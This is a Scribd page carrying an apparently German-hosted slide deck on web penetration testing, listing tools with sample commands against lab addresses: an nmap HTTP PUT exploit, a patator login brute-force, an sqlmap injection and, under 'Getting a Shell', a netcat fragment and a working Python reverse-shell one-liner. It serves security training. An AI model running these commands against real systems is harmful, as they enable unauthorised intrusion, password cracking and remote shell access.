Web Pentest

Hochgeladen von

gmatesunny

0% fanden dieses Dokument nützlich (0 Abstimmungen)

75 Ansichten14 Seiten

Pentesting

Copyright

Verfügbare Formate

PDF, TXT oder online auf Scribd lesen

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Dieses Dokument melden

Pentesting

Copyright:

Verfügbare Formate

Als PDF, TXT herunterladen oder online auf Scribd lesen

Markieren Sie unangemessene Inhalte

0% fanden dieses Dokument nützlich (0 Abstimmungen)

75 Ansichten14 Seiten

Web Pentest

Hochgeladen von

gmatesunny

Pentesting

Copyright:

Verfügbare Formate

Als PDF, TXT herunterladen oder online auf Scribd lesen

Markieren Sie unangemessene Inhalte

Zu Seite

Sie sind auf Seite 1von 14

Im Dokument suchen

Pentesting-Tools

Kali Linux
nmap
nikto
dirb
burp
hydra / patator / john
sqlmap
metasploit
linenum
python/perl/printf/echo
xclip/xxd
nmap
nmap -A -p 1-65535
nmap (more than port-scanning)
Nmap Scripting Engine (NSE) Module
Example: Exploit HTTP PUT

~$ nmap $IP \
--script=http-put.nse \
--script-args http-put.url='index.html',http-
put.file='my.html'
Nikto
Web Server Scanner
nikto -host 10.233.2.52
Evasion
Nikto
CGI-Directory Search: -C all
In case of WAF:
Evasion techniques: -evasion 1,...
HTTP Directory Scanner
Commandline:
dirb
Metasploit Modul:
auxiliary/scanner/http/dir_scanner
GUI:
dirbuster
Password Cracking
hydra
patator
Python
modular
handy commandline usage:
~$ patator http_fuzz method=POST \
follow=0 accept_cookie=0 --threads=10 timeout=10 \
url="http://172.31.11.207/login.html" 0=/root/wordlists/deutsch.txt \
body="username=admin&password=FILE0" \
-x ignore:fgrep="failed"
Password Cracking
Password-list Generator:
crunch
~$ crunch 1 4 -f /usr/share/crunch/charset.lst \
lalpha -o mixalpha-numeric.txt
Metasploit
Lot's of exploits...
Basic usage:
use auxiliary/scanner/http/dir_scanner
info
set RHOST 172.31.11.218
run

search pfsense
Burp
Proxy, Scanning, Fuzzing
sqlmap
sql-Injection
~$ sqlmap --dbms=mysql -u 'http://172.31.11.207/' \
--data \
'csrfmiddlewaretoken=ejmGY....&username=admin&passw
ord=asd'
Getting a Shell
Bind Shell vs Reverse Shell
nc -e /bin/bash
~$ python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STRE
AM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

http://pentestmonkey.net/cheat-sheet/shells/reverse-
shell-cheat-sheet
Privilege Escalation
Linux Enumeration: linenum
Other stuff
python/perl/printf/echo
printf %020x
tcpdump -i any -n "proto ICMP"
ping -p $data

Das könnte Ihnen auch gefallen

Syllabus PTXv2 PDF
Dokument22 Seiten
Syllabus PTXv2 PDF
Mehmet Emin Ozmen
Noch keine Bewertungen
Utd Traps Workshop Guide PDF
Dokument80 Seiten
Utd Traps Workshop Guide PDF
kmolopez
Noch keine Bewertungen
Advanced Penetration Testing Glossary 2
Dokument4 Seiten
Advanced Penetration Testing Glossary 2
Jhon Na
Noch keine Bewertungen
Securing Active Directory Administration: Sean Metcalf
Dokument127 Seiten
Securing Active Directory Administration: Sean Metcalf
Free Fox
Noch keine Bewertungen
CIS-CAT OVAL Customization Guide
Dokument43 Seiten
CIS-CAT OVAL Customization Guide
none
Noch keine Bewertungen
Wlan Setup Guide
Dokument66 Seiten
Wlan Setup Guide
Magara Edwin
Noch keine Bewertungen
Script Miktotik Full Jos Pokoknya
Dokument26 Seiten
Script Miktotik Full Jos Pokoknya
Dtodo fco
Noch keine Bewertungen
DDoS Mitigation A Complete Guide - 2019 Edition
Von Everand
DDoS Mitigation A Complete Guide - 2019 Edition
Gerardus Blokdyk
Noch keine Bewertungen
Configuring AsteriskNOW and FreePBX For SIP Extensions and Trunks
Dokument18 Seiten
Configuring AsteriskNOW and FreePBX For SIP Extensions and Trunks
hungzitan3274
Noch keine Bewertungen
How To Use AMD GPUs For Machine Learning On Windows - by Nathan Weatherly - The Startup - Medium
Dokument3 Seiten
How To Use AMD GPUs For Machine Learning On Windows - by Nathan Weatherly - The Startup - Medium
Ghivvago
Noch keine Bewertungen
SEP 14 Configure Protect CourseBook 2
Dokument325 Seiten
SEP 14 Configure Protect CourseBook 2
Nathan Badi
Noch keine Bewertungen
Lateral Movement Detection GPO Settings Cheat Sheet: Accounts, Users and Groups
Dokument1 Seite
Lateral Movement Detection GPO Settings Cheat Sheet: Accounts, Users and Groups
Sergio Tamayo
Noch keine Bewertungen
The Dude Manual en Ingles
Dokument116 Seiten
The Dude Manual en Ingles
Juan David Nanclares
Noch keine Bewertungen
Router Security Configuration Guide
Dokument291 Seiten
Router Security Configuration Guide
ghani
Noch keine Bewertungen
Dude Manual: From Mikrotik Wiki
Dokument12 Seiten
Dude Manual: From Mikrotik Wiki
Nyonri Palagan
Noch keine Bewertungen
Intelligence Led Penetration Testing Services Paper V2 Lo PDF
Dokument8 Seiten
Intelligence Led Penetration Testing Services Paper V2 Lo PDF
Agrebi noor
Noch keine Bewertungen
01-05 Data Plan
Dokument19 Seiten
01-05 Data Plan
hugobiar
Noch keine Bewertungen
12.4.1.1 Lab - Interpret HTTP and DNS Data To Isolate Threat Actor PDF
Dokument17 Seiten
12.4.1.1 Lab - Interpret HTTP and DNS Data To Isolate Threat Actor PDF
Interesting facts Channel
Noch keine Bewertungen
How Do I Configure Red Hat Enterprise Linux 3 or 4 To Access ISCSI Storage?
Dokument8 Seiten
How Do I Configure Red Hat Enterprise Linux 3 or 4 To Access ISCSI Storage?
Haadia Ahmad
Noch keine Bewertungen
Configuring NetScreen Firewalls
Von Everand
Configuring NetScreen Firewalls
Rob Cameron
Noch keine Bewertungen
Cisco Certified Security Professional A Complete Guide - 2020 Edition
Von Everand
Cisco Certified Security Professional A Complete Guide - 2020 Edition
Gerardus Blokdyk
Noch keine Bewertungen
How-To: DNS Enumeration: Author: Mohd Izhar Ali
Dokument13 Seiten
How-To: DNS Enumeration: Author: Mohd Izhar Ali
dmbowie89
Noch keine Bewertungen
FXO Gateway Setting For Elastix
Dokument7 Seiten
FXO Gateway Setting For Elastix
Alejandro Lizcano
Noch keine Bewertungen
Mimikatz Phdays
Dokument51 Seiten
Mimikatz Phdays
Carlos Vizcarra
Noch keine Bewertungen
PowerShell Advanced Function Parameter Attributes
Dokument6 Seiten
PowerShell Advanced Function Parameter Attributes
ignacio fernandez luengo
Noch keine Bewertungen
Windows Privilege Escalation
Dokument26 Seiten
Windows Privilege Escalation
malabaranja
Noch keine Bewertungen
Open VSwitch Getting Started
Dokument6 Seiten
Open VSwitch Getting Started
Yogesh Palkar
Noch keine Bewertungen
Lab 8.4.3b Managing Cisco IOS Images With ROMMON and TFTP: Objectives
Dokument13 Seiten
Lab 8.4.3b Managing Cisco IOS Images With ROMMON and TFTP: Objectives
Chu Đức Nghĩa
Noch keine Bewertungen
Exercices Ansible
Dokument1 Seite
Exercices Ansible
rasha hajlaoui
Noch keine Bewertungen
Isp Workshop PDF
Dokument218 Seiten
Isp Workshop PDF
SAPTARSHI GHOSH
Noch keine Bewertungen
Bigip F5 LTM Training Loadbalance: Syllabus Blueprint
Dokument1 Seite
Bigip F5 LTM Training Loadbalance: Syllabus Blueprint
shadab umair
Noch keine Bewertungen
12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple
Dokument18 Seiten
12.4.1.2 Lab - Isolate Compromised Host Using 5-Tuple
Jangjang Katuhu
Noch keine Bewertungen
Comands Switch Dell
Dokument4 Seiten
Comands Switch Dell
Rambubu Ranaman
Noch keine Bewertungen
Kaspersky security center
Von Everand
Kaspersky security center
Mohammed Haytham Khabbaz samkary
Noch keine Bewertungen
Dell Network Deployment and Planning Certification - Student Guidee4 PDF
Dokument175 Seiten
Dell Network Deployment and Planning Certification - Student Guidee4 PDF
Steven Vides
Noch keine Bewertungen
SSBP Slides PDF
Dokument118 Seiten
SSBP Slides PDF
kuldeep Bhati
Noch keine Bewertungen
V7000unified GBE 14oct
Dokument20 Seiten
V7000unified GBE 14oct
Antonio Martinez Ranz
Noch keine Bewertungen
0471295264
Dokument396 Seiten
0471295264
amokiam
Noch keine Bewertungen
Static NAT in SRX
Dokument4 Seiten
Static NAT in SRX
Son Tran Hong Nam
Noch keine Bewertungen
Module 1 - Basic Topology and Router Setup: The Following Will Be The Common Topology Used For The First Series of Labs
Dokument9 Seiten
Module 1 - Basic Topology and Router Setup: The Following Will Be The Common Topology Used For The First Series of Labs
kyawzinmon
Noch keine Bewertungen
Tulpa PWK Prep Guide1
Dokument9 Seiten
Tulpa PWK Prep Guide1
Elizabeth Parsons
Noch keine Bewertungen
Apache Load Balancer
Dokument8 Seiten
Apache Load Balancer
Juhász Tamás
Noch keine Bewertungen
Eve NG Addons
Dokument24 Seiten
Eve NG Addons
SureSh Freeman
Noch keine Bewertungen
Fireware Essentials Student Guide (En US) v11!10!1
Dokument510 Seiten
Fireware Essentials Student Guide (En US) v11!10!1
Anonymous RE8LRRM
100% (1)
Libvirt: Official Documentation
Dokument4 Seiten
Libvirt: Official Documentation
Gerardo Gonzalez
Noch keine Bewertungen
PWK Example Report v1
Dokument14 Seiten
PWK Example Report v1
Patrick Manzanza
100% (1)
Active Directory Lab - 01
Dokument10 Seiten
Active Directory Lab - 01
Adewale
Noch keine Bewertungen
Enterprise Firewall 6.4 Course Description-Online
Dokument2 Seiten
Enterprise Firewall 6.4 Course Description-Online
tarahp uf
Noch keine Bewertungen
Ospfv2 PDF
Dokument4 Seiten
Ospfv2 PDF
Swam Htet Lu
Noch keine Bewertungen
KVM
Dokument12 Seiten
KVM
alok541
Noch keine Bewertungen
Cisco Vs Huawei Essential Command Mapping
Dokument3 Seiten
Cisco Vs Huawei Essential Command Mapping
fmsbr
Noch keine Bewertungen
Arcsight L1
Dokument17 Seiten
Arcsight L1
selvapooja
Noch keine Bewertungen
Imperva DBF
Dokument11 Seiten
Imperva DBF
Fabricio Ramírez
Noch keine Bewertungen
FL Dcuct 5.1.2 LG
Dokument114 Seiten
FL Dcuct 5.1.2 LG
Landry Sylvere TSAMBA
Noch keine Bewertungen
LVM Linux
Dokument3 Seiten
LVM Linux
Yedu Emm Ess
Noch keine Bewertungen
Ospfv2 PDF
Dokument4 Seiten
Ospfv2 PDF
Swam Htet Lu
Noch keine Bewertungen
Us 19 Smith Fantastic Red Team Attacks and How To Find Them
Dokument87 Seiten
Us 19 Smith Fantastic Red Team Attacks and How To Find Them
Darsh Shah
Noch keine Bewertungen
MGE Galaxy 5000: Installation and User Manual
Dokument68 Seiten
MGE Galaxy 5000: Installation and User Manual
Wasinchai Kanjanapan
Noch keine Bewertungen
OWASP SCP Quick Reference Guide v1
Dokument12 Seiten
OWASP SCP Quick Reference Guide v1
shimaas
Noch keine Bewertungen
Mastering SaltStack
Von Everand
Mastering SaltStack
Hall Joseph
Noch keine Bewertungen
Final Exam SE-2 (Design)
Dokument10 Seiten
Final Exam SE-2 (Design)
Thuy Tien
Noch keine Bewertungen
Console Bacula PDF
Dokument51 Seiten
Console Bacula PDF
Pedro Tovar
Noch keine Bewertungen
Oracle Mediation PDF
Dokument56 Seiten
Oracle Mediation PDF
Sanjeev Xyzabc
Noch keine Bewertungen
Security & Risk Management
Dokument10 Seiten
Security & Risk Management
studycertification7106
Noch keine Bewertungen
SAP How To Step by Step Guide With Screen Shot
Dokument41 Seiten
SAP How To Step by Step Guide With Screen Shot
Kishore Reddy
Noch keine Bewertungen
FT-FGT-INF - FortiGate Infrastructure
Dokument3 Seiten
FT-FGT-INF - FortiGate Infrastructure
zayalaksme
Noch keine Bewertungen
UTS Image Prosessing Mif'ad Ikromullah
Dokument8 Seiten
UTS Image Prosessing Mif'ad Ikromullah
Jake Storage
Noch keine Bewertungen
Design Considerations For Citrix Storefront
Dokument8 Seiten
Design Considerations For Citrix Storefront
jesclap
Noch keine Bewertungen
RF 2.2.3.2 Server Setup Guide
Dokument19 Seiten
RF 2.2.3.2 Server Setup Guide
Harid Luthfi Pratama
100% (1)
The Chief Architects Guide To GDPR Cockroach Labs
Dokument17 Seiten
The Chief Architects Guide To GDPR Cockroach Labs
Márcio Antônio Moraes Reyes
Noch keine Bewertungen
51 Point Aws Security Configuration Checklist PDF
Dokument7 Seiten
51 Point Aws Security Configuration Checklist PDF
Sarita Gupta
Noch keine Bewertungen
Xampp Help
Dokument4 Seiten
Xampp Help
Dik Sadja
Noch keine Bewertungen
Introduction To Network Programming in Python
Dokument10 Seiten
Introduction To Network Programming in Python
Muhammad Shakeel
Noch keine Bewertungen
Fiori Code Reviewer
Dokument4 Seiten
Fiori Code Reviewer
Ahmed Khan
Noch keine Bewertungen
Omesh Talwar: PRINCE2 Practitioner Certified - ITIL V3 Foundation Certified"
Dokument3 Seiten
Omesh Talwar: PRINCE2 Practitioner Certified - ITIL V3 Foundation Certified"
Ashish Sharma
Noch keine Bewertungen
Steganography Image Project Proposal
Dokument3 Seiten
Steganography Image Project Proposal
Psycho Path
Noch keine Bewertungen
Sem Pron
Dokument35 Seiten
Sem Pron
Allyn Sempron
Noch keine Bewertungen
Gitignore Global
Dokument4 Seiten
Gitignore Global
Xiiao Pengguiins
Noch keine Bewertungen
06 Introduction To UNIX
Dokument23 Seiten
06 Introduction To UNIX
lodu lalit
Noch keine Bewertungen
Online Grading System Project in PHP With Source Code
Dokument3 Seiten
Online Grading System Project in PHP With Source Code
amaha alemayehu
Noch keine Bewertungen
Pembahasan Ukk 2018 TKJ Paket 4
Dokument1 Seite
Pembahasan Ukk 2018 TKJ Paket 4
Marliza Deviana
Noch keine Bewertungen
Passfile
Dokument27 Seiten
Passfile
Daniel Smk
60% (5)
Opennebula and Amazon Ec2 PDF
Dokument12 Seiten
Opennebula and Amazon Ec2 PDF
rafik03
Noch keine Bewertungen
MDG M Standard Workflow Issue
Dokument5 Seiten
MDG M Standard Workflow Issue
Jagadish Kopparti
Noch keine Bewertungen
Sap Ewm Tutorial Basics
Dokument22 Seiten
Sap Ewm Tutorial Basics
sathya kalyan
0% (2)
100M Practical
Dokument44 Seiten
100M Practical
saurabh singh gahlot
Noch keine Bewertungen
Aditya Shukla: Software Engineer
Dokument1 Seite
Aditya Shukla: Software Engineer
Aditya Shukla
Noch keine Bewertungen
Jasper Reports Server Web Services Guide
Dokument102 Seiten
Jasper Reports Server Web Services Guide
Bujtor Karoly
Noch keine Bewertungen
Time
Dokument215 Seiten
Time
james
Noch keine Bewertungen
Postilion Developer External PDF
Dokument2 Seiten
Postilion Developer External PDF
Mwansa
Noch keine Bewertungen